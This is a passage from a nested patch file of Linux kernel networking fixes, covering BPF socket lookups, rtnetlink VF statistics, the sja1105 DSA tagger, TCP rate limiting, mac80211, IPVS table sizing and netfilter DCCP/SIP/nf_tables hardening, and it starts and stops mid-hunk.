+ 					       sock_net(ctx->sk), 0,
+-					       IPPROTO_TCP, netns_id, flags);
++					       IPPROTO_TCP, netns_id, flags,
++					       -1);
+ }
+ 
+ static const struct bpf_func_proto bpf_sock_addr_skc_lookup_tcp_proto = {
+@@ -6753,7 +6831,7 @@ BPF_CALL_5(bpf_sock_addr_sk_lookup_tcp, struct bpf_sock_addr_kern *, ctx,
+ {
+ 	return (unsigned long)__bpf_sk_lookup(NULL, tuple, len,
+ 					      sock_net(ctx->sk), 0, IPPROTO_TCP,
+-					      netns_id, flags);
++					      netns_id, flags, -1);
+ }
+ 
+ static const struct bpf_func_proto bpf_sock_addr_sk_lookup_tcp_proto = {
+@@ -6772,7 +6850,7 @@ BPF_CALL_5(bpf_sock_addr_sk_lookup_udp, struct bpf_sock_addr_kern *, ctx,
+ {
+ 	return (unsigned long)__bpf_sk_lookup(NULL, tuple, len,
+ 					      sock_net(ctx->sk), 0, IPPROTO_UDP,
+-					      netns_id, flags);
++					      netns_id, flags, -1);
+ }
+ 
+ static const struct bpf_func_proto bpf_sock_addr_sk_lookup_udp_proto = {
+@@ -7902,9 +7980,9 @@ tc_cls_act_func_proto(enum bpf_func_id func_id, const struct bpf_prog *prog)
+ #endif
+ #ifdef CONFIG_INET
+ 	case BPF_FUNC_sk_lookup_tcp:
+-		return &bpf_sk_lookup_tcp_proto;
++		return &bpf_tc_sk_lookup_tcp_proto;
+ 	case BPF_FUNC_sk_lookup_udp:
+-		return &bpf_sk_lookup_udp_proto;
++		return &bpf_tc_sk_lookup_udp_proto;
+ 	case BPF_FUNC_sk_release:
+ 		return &bpf_sk_release_proto;
+ 	case BPF_FUNC_tcp_sock:
+@@ -7912,7 +7990,7 @@ tc_cls_act_func_proto(enum bpf_func_id func_id, const struct bpf_prog *prog)
+ 	case BPF_FUNC_get_listener_sock:
+ 		return &bpf_get_listener_sock_proto;
+ 	case BPF_FUNC_skc_lookup_tcp:
+-		return &bpf_skc_lookup_tcp_proto;
++		return &bpf_tc_skc_lookup_tcp_proto;
+ 	case BPF_FUNC_tcp_check_syncookie:
+ 		return &bpf_tcp_check_syncookie_proto;
+ 	case BPF_FUNC_skb_ecn_set_ce:
+diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
+index b192c69f3936c..5625ed30a06f3 100644
+--- a/net/core/rtnetlink.c
++++ b/net/core/rtnetlink.c
+@@ -957,24 +957,27 @@ static inline int rtnl_vfinfo_size(const struct net_device *dev,
+ 			 nla_total_size(sizeof(struct ifla_vf_rate)) +
+ 			 nla_total_size(sizeof(struct ifla_vf_link_state)) +
+ 			 nla_total_size(sizeof(struct ifla_vf_rss_query_en)) +
+-			 nla_total_size(0) + /* nest IFLA_VF_STATS */
+-			 /* IFLA_VF_STATS_RX_PACKETS */
+-			 nla_total_size_64bit(sizeof(__u64)) +
+-			 /* IFLA_VF_STATS_TX_PACKETS */
+-			 nla_total_size_64bit(sizeof(__u64)) +
+-			 /* IFLA_VF_STATS_RX_BYTES */
+-			 nla_total_size_64bit(sizeof(__u64)) +
+-			 /* IFLA_VF_STATS_TX_BYTES */
+-			 nla_total_size_64bit(sizeof(__u64)) +
+-			 /* IFLA_VF_STATS_BROADCAST */
+-			 nla_total_size_64bit(sizeof(__u64)) +
+-			 /* IFLA_VF_STATS_MULTICAST */
+-			 nla_total_size_64bit(sizeof(__u64)) +
+-			 /* IFLA_VF_STATS_RX_DROPPED */
+-			 nla_total_size_64bit(sizeof(__u64)) +
+-			 /* IFLA_VF_STATS_TX_DROPPED */
+-			 nla_total_size_64bit(sizeof(__u64)) +
+ 			 nla_total_size(sizeof(struct ifla_vf_trust)));
++		if (~ext_filter_mask & RTEXT_FILTER_SKIP_STATS) {
++			size += num_vfs *
++				(nla_total_size(0) + /* nest IFLA_VF_STATS */
++				 /* IFLA_VF_STATS_RX_PACKETS */
++				 nla_total_size_64bit(sizeof(__u64)) +
++				 /* IFLA_VF_STATS_TX_PACKETS */
++				 nla_total_size_64bit(sizeof(__u64)) +
++				 /* IFLA_VF_STATS_RX_BYTES */
++				 nla_total_size_64bit(sizeof(__u64)) +
++				 /* IFLA_VF_STATS_TX_BYTES */
++				 nla_total_size_64bit(sizeof(__u64)) +
++				 /* IFLA_VF_STATS_BROADCAST */
++				 nla_total_size_64bit(sizeof(__u64)) +
++				 /* IFLA_VF_STATS_MULTICAST */
++				 nla_total_size_64bit(sizeof(__u64)) +
++				 /* IFLA_VF_STATS_RX_DROPPED */
++				 nla_total_size_64bit(sizeof(__u64)) +
++				 /* IFLA_VF_STATS_TX_DROPPED */
++				 nla_total_size_64bit(sizeof(__u64)));
++		}
+ 		return size;
+ 	} else
+ 		return 0;
+@@ -1253,7 +1256,8 @@ static noinline_for_stack int rtnl_fill_stats(struct sk_buff *skb,
+ static noinline_for_stack int rtnl_fill_vfinfo(struct sk_buff *skb,
+ 					       struct net_device *dev,
+ 					       int vfs_num,
+-					       struct nlattr *vfinfo)
++					       struct nlattr *vfinfo,
++					       u32 ext_filter_mask)
+ {
+ 	struct ifla_vf_rss_query_en vf_rss_query_en;
+ 	struct nlattr *vf, *vfstats, *vfvlanlist;
+@@ -1359,33 +1363,35 @@ static noinline_for_stack int rtnl_fill_vfinfo(struct sk_buff *skb,
+ 		goto nla_put_vf_failure;
+ 	}
+ 	nla_nest_end(skb, vfvlanlist);
+-	memset(&vf_stats, 0, sizeof(vf_stats));
+-	if (dev->netdev_ops->ndo_get_vf_stats)
+-		dev->netdev_ops->ndo_get_vf_stats(dev, vfs_num,
+-						&vf_stats);
+-	vfstats = nla_nest_start_noflag(skb, IFLA_VF_STATS);
+-	if (!vfstats)
+-		goto nla_put_vf_failure;
+-	if (nla_put_u64_64bit(skb, IFLA_VF_STATS_RX_PACKETS,
+-			      vf_stats.rx_packets, IFLA_VF_STATS_PAD) ||
+-	    nla_put_u64_64bit(skb, IFLA_VF_STATS_TX_PACKETS,
+-			      vf_stats.tx_packets, IFLA_VF_STATS_PAD) ||
+-	    nla_put_u64_64bit(skb, IFLA_VF_STATS_RX_BYTES,
+-			      vf_stats.rx_bytes, IFLA_VF_STATS_PAD) ||
+-	    nla_put_u64_64bit(skb, IFLA_VF_STATS_TX_BYTES,
+-			      vf_stats.tx_bytes, IFLA_VF_STATS_PAD) ||
+-	    nla_put_u64_64bit(skb, IFLA_VF_STATS_BROADCAST,
+-			      vf_stats.broadcast, IFLA_VF_STATS_PAD) ||
+-	    nla_put_u64_64bit(skb, IFLA_VF_STATS_MULTICAST,
+-			      vf_stats.multicast, IFLA_VF_STATS_PAD) ||
+-	    nla_put_u64_64bit(skb, IFLA_VF_STATS_RX_DROPPED,
+-			      vf_stats.rx_dropped, IFLA_VF_STATS_PAD) ||
+-	    nla_put_u64_64bit(skb, IFLA_VF_STATS_TX_DROPPED,
+-			      vf_stats.tx_dropped, IFLA_VF_STATS_PAD)) {
+-		nla_nest_cancel(skb, vfstats);
+-		goto nla_put_vf_failure;
++	if (~ext_filter_mask & RTEXT_FILTER_SKIP_STATS) {
++		memset(&vf_stats, 0, sizeof(vf_stats));
++		if (dev->netdev_ops->ndo_get_vf_stats)
++			dev->netdev_ops->ndo_get_vf_stats(dev, vfs_num,
++							  &vf_stats);
++		vfstats = nla_nest_start_noflag(skb, IFLA_VF_STATS);
++		if (!vfstats)
++			goto nla_put_vf_failure;
++		if (nla_put_u64_64bit(skb, IFLA_VF_STATS_RX_PACKETS,
++				      vf_stats.rx_packets, IFLA_VF_STATS_PAD) ||
++		    nla_put_u64_64bit(skb, IFLA_VF_STATS_TX_PACKETS,
++				      vf_stats.tx_packets, IFLA_VF_STATS_PAD) ||
++		    nla_put_u64_64bit(skb, IFLA_VF_STATS_RX_BYTES,
++				      vf_stats.rx_bytes, IFLA_VF_STATS_PAD) ||
++		    nla_put_u64_64bit(skb, IFLA_VF_STATS_TX_BYTES,
++				      vf_stats.tx_bytes, IFLA_VF_STATS_PAD) ||
++		    nla_put_u64_64bit(skb, IFLA_VF_STATS_BROADCAST,
++				      vf_stats.broadcast, IFLA_VF_STATS_PAD) ||
++		    nla_put_u64_64bit(skb, IFLA_VF_STATS_MULTICAST,
++				      vf_stats.multicast, IFLA_VF_STATS_PAD) ||
++		    nla_put_u64_64bit(skb, IFLA_VF_STATS_RX_DROPPED,
++				      vf_stats.rx_dropped, IFLA_VF_STATS_PAD) ||
++		    nla_put_u64_64bit(skb, IFLA_VF_STATS_TX_DROPPED,
++				      vf_stats.tx_dropped, IFLA_VF_STATS_PAD)) {
++			nla_nest_cancel(skb, vfstats);
++			goto nla_put_vf_failure;
++		}
++		nla_nest_end(skb, vfstats);
+ 	}
+-	nla_nest_end(skb, vfstats);
+ 	nla_nest_end(skb, vf);
+ 	return 0;
+ 
+@@ -1418,7 +1424,7 @@ static noinline_for_stack int rtnl_fill_vf(struct sk_buff *skb,
+ 		return -EMSGSIZE;
+ 
+ 	for (i = 0; i < num_vfs; i++) {
+-		if (rtnl_fill_vfinfo(skb, dev, i, vfinfo))
++		if (rtnl_fill_vfinfo(skb, dev, i, vfinfo, ext_filter_mask))
+ 			return -EMSGSIZE;
+ 	}
+ 
+@@ -3986,7 +3992,7 @@ static int nlmsg_populate_fdb_fill(struct sk_buff *skb,
+ 	ndm->ndm_ifindex = dev->ifindex;
+ 	ndm->ndm_state   = ndm_state;
+ 
+-	if (nla_put(skb, NDA_LLADDR, ETH_ALEN, addr))
++	if (nla_put(skb, NDA_LLADDR, dev->addr_len, addr))
+ 		goto nla_put_failure;
+ 	if (vid)
+ 		if (nla_put(skb, NDA_VLAN, sizeof(u16), &vid))
+@@ -4000,10 +4006,10 @@ nla_put_failure:
+ 	return -EMSGSIZE;
+ }
+ 
+-static inline size_t rtnl_fdb_nlmsg_size(void)
++static inline size_t rtnl_fdb_nlmsg_size(const struct net_device *dev)
+ {
+ 	return NLMSG_ALIGN(sizeof(struct ndmsg)) +
+-	       nla_total_size(ETH_ALEN) +	/* NDA_LLADDR */
++	       nla_total_size(dev->addr_len) +	/* NDA_LLADDR */
+ 	       nla_total_size(sizeof(u16)) +	/* NDA_VLAN */
+ 	       0;
+ }
+@@ -4015,7 +4021,7 @@ static void rtnl_fdb_notify(struct net_device *dev, u8 *addr, u16 vid, int type,
+ 	struct sk_buff *skb;
+ 	int err = -ENOBUFS;
+ 
+-	skb = nlmsg_new(rtnl_fdb_nlmsg_size(), GFP_ATOMIC);
++	skb = nlmsg_new(rtnl_fdb_nlmsg_size(dev), GFP_ATOMIC);
+ 	if (!skb)
+ 		goto errout;
+ 
+diff --git a/net/core/sock.c b/net/core/sock.c
+index b021cb9c95ef3..0c1baa5517f11 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -2542,13 +2542,24 @@ kuid_t sock_i_uid(struct sock *sk)
+ }
+ EXPORT_SYMBOL(sock_i_uid);
+ 
+-unsigned long sock_i_ino(struct sock *sk)
++unsigned long __sock_i_ino(struct sock *sk)
+ {
+ 	unsigned long ino;
+ 
+-	read_lock_bh(&sk->sk_callback_lock);
++	read_lock(&sk->sk_callback_lock);
+ 	ino = sk->sk_socket ? SOCK_INODE(sk->sk_socket)->i_ino : 0;
+-	read_unlock_bh(&sk->sk_callback_lock);
++	read_unlock(&sk->sk_callback_lock);
++	return ino;
++}
++EXPORT_SYMBOL(__sock_i_ino);
++
++unsigned long sock_i_ino(struct sock *sk)
++{
++	unsigned long ino;
++
++	local_bh_disable();
++	ino = __sock_i_ino(sk);
++	local_bh_enable();
+ 	return ino;
+ }
+ EXPORT_SYMBOL(sock_i_ino);
+diff --git a/net/dsa/tag_sja1105.c b/net/dsa/tag_sja1105.c
+index 1a85125bda6da..143348962a216 100644
+--- a/net/dsa/tag_sja1105.c
++++ b/net/dsa/tag_sja1105.c
+@@ -53,11 +53,8 @@
+ #define SJA1110_TX_TRAILER_LEN			4
+ #define SJA1110_MAX_PADDING_LEN			15
+ 
+-#define SJA1105_HWTS_RX_EN			0
+-
+ struct sja1105_tagger_private {
+ 	struct sja1105_tagger_data data; /* Must be first */
+-	unsigned long state;
+ 	/* Protects concurrent access to the meta state machine
+ 	 * from taggers running on multiple ports on SMP systems
+ 	 */
+@@ -113,8 +110,8 @@ static void sja1105_meta_unpack(const struct sk_buff *skb,
+ 	 * a unified unpacking command for both device series.
+ 	 */
+ 	packing(buf,     &meta->tstamp,     31, 0, 4, UNPACK, 0);
+-	packing(buf + 4, &meta->dmac_byte_4, 7, 0, 1, UNPACK, 0);
+-	packing(buf + 5, &meta->dmac_byte_3, 7, 0, 1, UNPACK, 0);
++	packing(buf + 4, &meta->dmac_byte_3, 7, 0, 1, UNPACK, 0);
++	packing(buf + 5, &meta->dmac_byte_4, 7, 0, 1, UNPACK, 0);
+ 	packing(buf + 6, &meta->source_port, 7, 0, 1, UNPACK, 0);
+ 	packing(buf + 7, &meta->switch_id,   7, 0, 1, UNPACK, 0);
+ }
+@@ -387,10 +384,6 @@ static struct sk_buff
+ 
+ 		priv = sja1105_tagger_private(ds);
+ 
+-		if (!test_bit(SJA1105_HWTS_RX_EN, &priv->state))
+-			/* Do normal processing. */
+-			return skb;
+-
+ 		spin_lock(&priv->meta_lock);
+ 		/* Was this a link-local frame instead of the meta
+ 		 * that we were expecting?
+@@ -426,12 +419,6 @@ static struct sk_buff
+ 
+ 		priv = sja1105_tagger_private(ds);
+ 
+-		/* Drop the meta frame if we're not in the right state
+-		 * to process it.
+-		 */
+-		if (!test_bit(SJA1105_HWTS_RX_EN, &priv->state))
+-			return NULL;
+-
+ 		spin_lock(&priv->meta_lock);
+ 
+ 		stampable_skb = priv->stampable_skb;
+@@ -467,30 +454,6 @@ static struct sk_buff
+ 	return skb;
+ }
+ 
+-static bool sja1105_rxtstamp_get_state(struct dsa_switch *ds)
+-{
+-	struct sja1105_tagger_private *priv = sja1105_tagger_private(ds);
+-
+-	return test_bit(SJA1105_HWTS_RX_EN, &priv->state);
+-}
+-
+-static void sja1105_rxtstamp_set_state(struct dsa_switch *ds, bool on)
+-{
+-	struct sja1105_tagger_private *priv = sja1105_tagger_private(ds);
+-
+-	if (on)
+-		set_bit(SJA1105_HWTS_RX_EN, &priv->state);
+-	else
+-		clear_bit(SJA1105_HWTS_RX_EN, &priv->state);
+-
+-	/* Initialize the meta state machine to a known state */
+-	if (!priv->stampable_skb)
+-		return;
+-
+-	kfree_skb(priv->stampable_skb);
+-	priv->stampable_skb = NULL;
+-}
+-
+ static bool sja1105_skb_has_tag_8021q(const struct sk_buff *skb)
+ {
+ 	u16 tpid = ntohs(eth_hdr(skb)->h_proto);
+@@ -540,33 +503,53 @@ static struct sk_buff *sja1105_rcv(struct sk_buff *skb,
+ 	is_link_local = sja1105_is_link_local(skb);
+ 	is_meta = sja1105_is_meta_frame(skb);
+ 
+-	if (sja1105_skb_has_tag_8021q(skb)) {
+-		/* Normal traffic path. */
+-		sja1105_vlan_rcv(skb, &source_port, &switch_id, &vbid, &vid);
+-	} else if (is_link_local) {
++	if (is_link_local) {
+ 		/* Management traffic path. Switch embeds the switch ID and
+ 		 * port ID into bytes of the destination MAC, courtesy of
+ 		 * the incl_srcpt options.
+ 		 */
+ 		source_port = hdr->h_dest[3];
+ 		switch_id = hdr->h_dest[4];
+-		/* Clear the DMAC bytes that were mangled by the switch */
+-		hdr->h_dest[3] = 0;
+-		hdr->h_dest[4] = 0;
+ 	} else if (is_meta) {
+ 		sja1105_meta_unpack(skb, &meta);
+ 		source_port = meta.source_port;
+ 		switch_id = meta.switch_id;
+-	} else {
++	}
++
++	/* Normal data plane traffic and link-local frames are tagged with
++	 * a tag_8021q VLAN which we have to strip
++	 */
++	if (sja1105_skb_has_tag_8021q(skb)) {
++		int tmp_source_port = -1, tmp_switch_id = -1;
++
++		sja1105_vlan_rcv(skb, &tmp_source_port, &tmp_switch_id, &vbid,
++				 &vid);
++		/* Preserve the source information from the INCL_SRCPT option,
++		 * if available. This allows us to not overwrite a valid source
++		 * port and switch ID with zeroes when receiving link-local
++		 * frames from a VLAN-unaware bridged port (non-zero vbid) or a
++		 * VLAN-aware bridged port (non-zero vid). Furthermore, the
++		 * tag_8021q source port information is only of trust when the
++		 * vbid is 0 (precise port). Otherwise, tmp_source_port and
++		 * tmp_switch_id will be zeroes.
++		 */
++		if (vbid == 0 && source_port == -1)
++			source_port = tmp_source_port;
++		if (vbid == 0 && switch_id == -1)
++			switch_id = tmp_switch_id;
++	} else if (source_port == -1 && switch_id == -1) {
++		/* Packets with no source information have no chance of
++		 * getting accepted, drop them straight away.
++		 */
+ 		return NULL;
+ 	}
+ 
+-	if (vbid >= 1)
++	if (source_port != -1 && switch_id != -1)
++		skb->dev = dsa_master_find_slave(netdev, switch_id, source_port);
++	else if (vbid >= 1)
+ 		skb->dev = dsa_tag_8021q_find_port_by_vbid(netdev, vbid);
+-	else if (source_port == -1 || switch_id == -1)
+-		skb->dev = dsa_find_designated_bridge_port_by_vid(netdev, vid);
+ 	else
+-		skb->dev = dsa_master_find_slave(netdev, switch_id, source_port);
++		skb->dev = dsa_find_designated_bridge_port_by_vid(netdev, vid);
+ 	if (!skb->dev) {
+ 		netdev_warn(netdev, "Couldn't decode source port\n");
+ 		return NULL;
+@@ -757,7 +740,6 @@ static void sja1105_disconnect(struct dsa_switch *ds)
+ 
+ static int sja1105_connect(struct dsa_switch *ds)
+ {
+-	struct sja1105_tagger_data *tagger_data;
+ 	struct sja1105_tagger_private *priv;
+ 	struct kthread_worker *xmit_worker;
+ 	int err;
+@@ -777,10 +759,6 @@ static int sja1105_connect(struct dsa_switch *ds)
+ 	}
+ 
+ 	priv->xmit_worker = xmit_worker;
+-	/* Export functions for switch driver use */
+-	tagger_data = &priv->data;
+-	tagger_data->rxtstamp_get_state = sja1105_rxtstamp_get_state;
+-	tagger_data->rxtstamp_set_state = sja1105_rxtstamp_set_state;
+ 	ds->tagger_data = priv;
+ 
+ 	return 0;
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index 5dabb38b857ff..e2d3ea2e34561 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -3590,8 +3590,11 @@ static int tcp_ack_update_window(struct sock *sk, const struct sk_buff *skb, u32
+ static bool __tcp_oow_rate_limited(struct net *net, int mib_idx,
+ 				   u32 *last_oow_ack_time)
+ {
+-	if (*last_oow_ack_time) {
+-		s32 elapsed = (s32)(tcp_jiffies32 - *last_oow_ack_time);
++	/* Paired with the WRITE_ONCE() in this function. */
++	u32 val = READ_ONCE(*last_oow_ack_time);
++
++	if (val) {
++		s32 elapsed = (s32)(tcp_jiffies32 - val);
+ 
+ 		if (0 <= elapsed &&
+ 		    elapsed < READ_ONCE(net->ipv4.sysctl_tcp_invalid_ratelimit)) {
+@@ -3600,7 +3603,10 @@ static bool __tcp_oow_rate_limited(struct net *net, int mib_idx,
+ 		}
+ 	}
+ 
+-	*last_oow_ack_time = tcp_jiffies32;
++	/* Paired with the prior READ_ONCE() and with itself,
++	 * as we might be lockless.
++	 */
++	WRITE_ONCE(*last_oow_ack_time, tcp_jiffies32);
+ 
+ 	return false;	/* not rate-limited: go ahead, send dupack now! */
+ }
+diff --git a/net/mac80211/debugfs_netdev.c b/net/mac80211/debugfs_netdev.c
+index 5b014786fd2d0..08a1d7564b7f2 100644
+--- a/net/mac80211/debugfs_netdev.c
++++ b/net/mac80211/debugfs_netdev.c
+@@ -694,7 +694,7 @@ static void add_sta_files(struct ieee80211_sub_if_data *sdata)
+ 	DEBUGFS_ADD_MODE(uapsd_queues, 0600);
+ 	DEBUGFS_ADD_MODE(uapsd_max_sp_len, 0600);
+ 	DEBUGFS_ADD_MODE(tdls_wider_bw, 0600);
+-	DEBUGFS_ADD_MODE(valid_links, 0200);
++	DEBUGFS_ADD_MODE(valid_links, 0400);
+ 	DEBUGFS_ADD_MODE(active_links, 0600);
+ }
+ 
+diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
+index 30efa26f977f6..b8c6f6a668fc9 100644
+--- a/net/mac80211/sta_info.c
++++ b/net/mac80211/sta_info.c
+@@ -2861,6 +2861,8 @@ int ieee80211_sta_activate_link(struct sta_info *sta, unsigned int link_id)
+ 	if (!test_sta_flag(sta, WLAN_STA_INSERTED))
+ 		goto hash;
+ 
++	ieee80211_recalc_min_chandef(sdata, link_id);
++
+ 	/* Ensure the values are updated for the driver,
+ 	 * redone by sta_remove_link on failure.
+ 	 */
+diff --git a/net/mac80211/util.c b/net/mac80211/util.c
+index 784b9ba61581e..98806c359b173 100644
+--- a/net/mac80211/util.c
++++ b/net/mac80211/util.c
+@@ -3599,10 +3599,8 @@ bool ieee80211_chandef_he_6ghz_oper(struct ieee80211_sub_if_data *sdata,
+ 	}
+ 
+ 	eht_cap = ieee80211_get_eht_iftype_cap(sband, iftype);
+-	if (!eht_cap) {
+-		sdata_info(sdata, "Missing iftype sband data/EHT cap");
++	if (!eht_cap)
+ 		eht_oper = NULL;
+-	}
+ 
+ 	he_6ghz_oper = ieee80211_he_6ghz_oper(he_oper);
+ 
+diff --git a/net/netfilter/ipvs/Kconfig b/net/netfilter/ipvs/Kconfig
+index 271da8447b293..2a3017b9c001b 100644
+--- a/net/netfilter/ipvs/Kconfig
++++ b/net/netfilter/ipvs/Kconfig
+@@ -44,7 +44,8 @@ config	IP_VS_DEBUG
+ 
+ config	IP_VS_TAB_BITS
+ 	int "IPVS connection table size (the Nth power of 2)"
+-	range 8 20
++	range 8 20 if !64BIT
++	range 8 27 if 64BIT
+ 	default 12
+ 	help
+ 	  The IPVS connection hash table uses the chaining scheme to handle
+@@ -54,24 +55,24 @@ config	IP_VS_TAB_BITS
+ 
+ 	  Note the table size must be power of 2. The table size will be the
+ 	  value of 2 to the your input number power. The number to choose is
+-	  from 8 to 20, the default number is 12, which means the table size
+-	  is 4096. Don't input the number too small, otherwise you will lose
+-	  performance on it. You can adapt the table size yourself, according
+-	  to your virtual server application. It is good to set the table size
+-	  not far less than the number of connections per second multiplying
+-	  average lasting time of connection in the table.  For example, your
+-	  virtual server gets 200 connections per second, the connection lasts
+-	  for 200 seconds in average in the connection table, the table size
+-	  should be not far less than 200x200, it is good to set the table
+-	  size 32768 (2**15).
++	  from 8 to 27 for 64BIT(20 otherwise), the default number is 12,
++	  which means the table size is 4096. Don't input the number too
++	  small, otherwise you will lose performance on it. You can adapt the
++	  table size yourself, according to your virtual server application.
++	  It is good to set the table size not far less than the number of
++	  connections per second multiplying average lasting time of
++	  connection in the table.  For example, your virtual server gets 200
++	  connections per second, the connection lasts for 200 seconds in
++	  average in the connection table, the table size should be not far
++	  less than 200x200, it is good to set the table size 32768 (2**15).
+ 
+ 	  Another note that each connection occupies 128 bytes effectively and
+ 	  each hash entry uses 8 bytes, so you can estimate how much memory is
+ 	  needed for your box.
+ 
+ 	  You can overwrite this number setting conn_tab_bits module parameter
+-	  or by appending ip_vs.conn_tab_bits=? to the kernel command line
+-	  if IP VS was compiled built-in.
++	  or by appending ip_vs.conn_tab_bits=? to the kernel command line if
++	  IP VS was compiled built-in.
+ 
+ comment "IPVS transport protocol load balancing support"
+ 
+diff --git a/net/netfilter/ipvs/ip_vs_conn.c b/net/netfilter/ipvs/ip_vs_conn.c
+index 13534e02346cc..e1b9b52909a5d 100644
+--- a/net/netfilter/ipvs/ip_vs_conn.c
++++ b/net/netfilter/ipvs/ip_vs_conn.c
+@@ -1484,8 +1484,8 @@ int __init ip_vs_conn_init(void)
+ 	int idx;
+ 
+ 	/* Compute size and mask */
+-	if (ip_vs_conn_tab_bits < 8 || ip_vs_conn_tab_bits > 20) {
+-		pr_info("conn_tab_bits not in [8, 20]. Using default value\n");
++	if (ip_vs_conn_tab_bits < 8 || ip_vs_conn_tab_bits > 27) {
++		pr_info("conn_tab_bits not in [8, 27]. Using default value\n");
+ 		ip_vs_conn_tab_bits = CONFIG_IP_VS_TAB_BITS;
+ 	}
+ 	ip_vs_conn_tab_size = 1 << ip_vs_conn_tab_bits;
+diff --git a/net/netfilter/nf_conntrack_helper.c b/net/netfilter/nf_conntrack_helper.c
+index ff737a76052ed..bf09a1e062481 100644
+--- a/net/netfilter/nf_conntrack_helper.c
++++ b/net/netfilter/nf_conntrack_helper.c
+@@ -358,6 +358,9 @@ int nf_conntrack_helper_register(struct nf_conntrack_helper *me)
+ 	BUG_ON(me->expect_class_max >= NF_CT_MAX_EXPECT_CLASSES);
+ 	BUG_ON(strlen(me->name) > NF_CT_HELPER_NAME_LEN - 1);
+ 
++	if (!nf_ct_helper_hash)
++		return -ENOENT;
++
+ 	if (me->expect_policy->max_expected > NF_CT_EXPECT_MAX_CNT)
+ 		return -EINVAL;
+ 
+@@ -513,4 +516,5 @@ int nf_conntrack_helper_init(void)
+ void nf_conntrack_helper_fini(void)
+ {
+ 	kvfree(nf_ct_helper_hash);
++	nf_ct_helper_hash = NULL;
+ }
+diff --git a/net/netfilter/nf_conntrack_proto_dccp.c b/net/netfilter/nf_conntrack_proto_dccp.c
+index c1557d47ccd1e..d4fd626d2b8c3 100644
+--- a/net/netfilter/nf_conntrack_proto_dccp.c
++++ b/net/netfilter/nf_conntrack_proto_dccp.c
+@@ -432,9 +432,19 @@ static bool dccp_error(const struct dccp_hdr *dh,
+ 		       struct sk_buff *skb, unsigned int dataoff,
+ 		       const struct nf_hook_state *state)
+ {
++	static const unsigned long require_seq48 = 1 << DCCP_PKT_REQUEST |
++						   1 << DCCP_PKT_RESPONSE |
++						   1 << DCCP_PKT_CLOSEREQ |
++						   1 << DCCP_PKT_CLOSE |
++						   1 << DCCP_PKT_RESET |
++						   1 << DCCP_PKT_SYNC |
++						   1 << DCCP_PKT_SYNCACK;
+ 	unsigned int dccp_len = skb->len - dataoff;
+ 	unsigned int cscov;
+ 	const char *msg;
++	u8 type;
++
++	BUILD_BUG_ON(DCCP_PKT_INVALID >= BITS_PER_LONG);
+ 
+ 	if (dh->dccph_doff * 4 < sizeof(struct dccp_hdr) ||
+ 	    dh->dccph_doff * 4 > dccp_len) {
+@@ -459,34 +469,70 @@ static bool dccp_error(const struct dccp_hdr *dh,
+ 		goto out_invalid;
+ 	}
+ 
+-	if (dh->dccph_type >= DCCP_PKT_INVALID) {
++	type = dh->dccph_type;
++	if (type >= DCCP_PKT_INVALID) {
+ 		msg = "nf_ct_dccp: reserved packet type ";
+ 		goto out_invalid;
+ 	}
++
++	if (test_bit(type, &require_seq48) && !dh->dccph_x) {
++		msg = "nf_ct_dccp: type lacks 48bit sequence numbers";
++		goto out_invalid;
++	}
++
+ 	return false;
+ out_invalid:
+ 	nf_l4proto_log_invalid(skb, state, IPPROTO_DCCP, "%s", msg);
+ 	return true;
+ }
+ 
++struct nf_conntrack_dccp_buf {
++	struct dccp_hdr dh;	 /* generic header part */
++	struct dccp_hdr_ext ext; /* optional depending dh->dccph_x */
++	union {			 /* depends on header type */
++		struct dccp_hdr_ack_bits ack;
++		struct dccp_hdr_request req;
++		struct dccp_hdr_response response;
++		struct dccp_hdr_reset rst;
++	} u;
++};
++
++static struct dccp_hdr *
++dccp_header_pointer(const struct sk_buff *skb, int offset, const struct dccp_hdr *dh,
++		    struct nf_conntrack_dccp_buf *buf)
++{
++	unsigned int hdrlen = __dccp_hdr_len(dh);
++
++	if (hdrlen > sizeof(*buf))
++		return NULL;
++
++	return skb_header_pointer(skb, offset, hdrlen, buf);
++}
++
+ int nf_conntrack_dccp_packet(struct nf_conn *ct, struct sk_buff *skb,
+ 			     unsigned int dataoff,
+ 			     enum ip_conntrack_info ctinfo,
+ 			     const struct nf_hook_state *state)
+ {
+ 	enum ip_conntrack_dir dir = CTINFO2DIR(ctinfo);
+-	struct dccp_hdr _dh, *dh;
++	struct nf_conntrack_dccp_buf _dh;
+ 	u_int8_t type, old_state, new_state;
+ 	enum ct_dccp_roles role;
+ 	unsigned int *timeouts;
++	struct dccp_hdr *dh;
+ 
+-	dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &_dh);
++	dh = skb_header_pointer(skb, dataoff, sizeof(*dh), &_dh.dh);
+ 	if (!dh)
+ 		return NF_DROP;
+ 
+ 	if (dccp_error(dh, skb, dataoff, state))
+ 		return -NF_ACCEPT;
+ 
++	/* pull again, including possible 48 bit sequences and subtype header */
++	dh = dccp_header_pointer(skb, dataoff, dh, &_dh);
++	if (!dh)
++		return NF_DROP;
++
+ 	type = dh->dccph_type;
+ 	if (!nf_ct_is_confirmed(ct) && !dccp_new(ct, skb, dh, state))
+ 		return -NF_ACCEPT;
+diff --git a/net/netfilter/nf_conntrack_sip.c b/net/netfilter/nf_conntrack_sip.c
+index 77f5e82d8e3fe..d0eac27f6ba03 100644
+--- a/net/netfilter/nf_conntrack_sip.c
++++ b/net/netfilter/nf_conntrack_sip.c
+@@ -611,7 +611,7 @@ int ct_sip_parse_numerical_param(const struct nf_conn *ct, const char *dptr,
+ 	start += strlen(name);
+ 	*val = simple_strtoul(start, &end, 0);
+ 	if (start == end)
+-		return 0;
++		return -1;
+ 	if (matchoff && matchlen) {
+ 		*matchoff = start - dptr;
+ 		*matchlen = end - start;
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 7f71bdbc82672..938cfa9a3adb6 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -2628,7 +2628,7 @@ err:
+ 
+ static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
+ 					       const struct nft_table *table,
+-					       const struct nlattr *nla)
++					       const struct nlattr *nla, u8 genmask)
+ {
+ 	struct nftables_pernet *nft_net = nft_pernet(net);
+ 	u32 id = ntohl(nla_get_be32(nla));
+@@ -2639,7 +2639,8 @@ static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
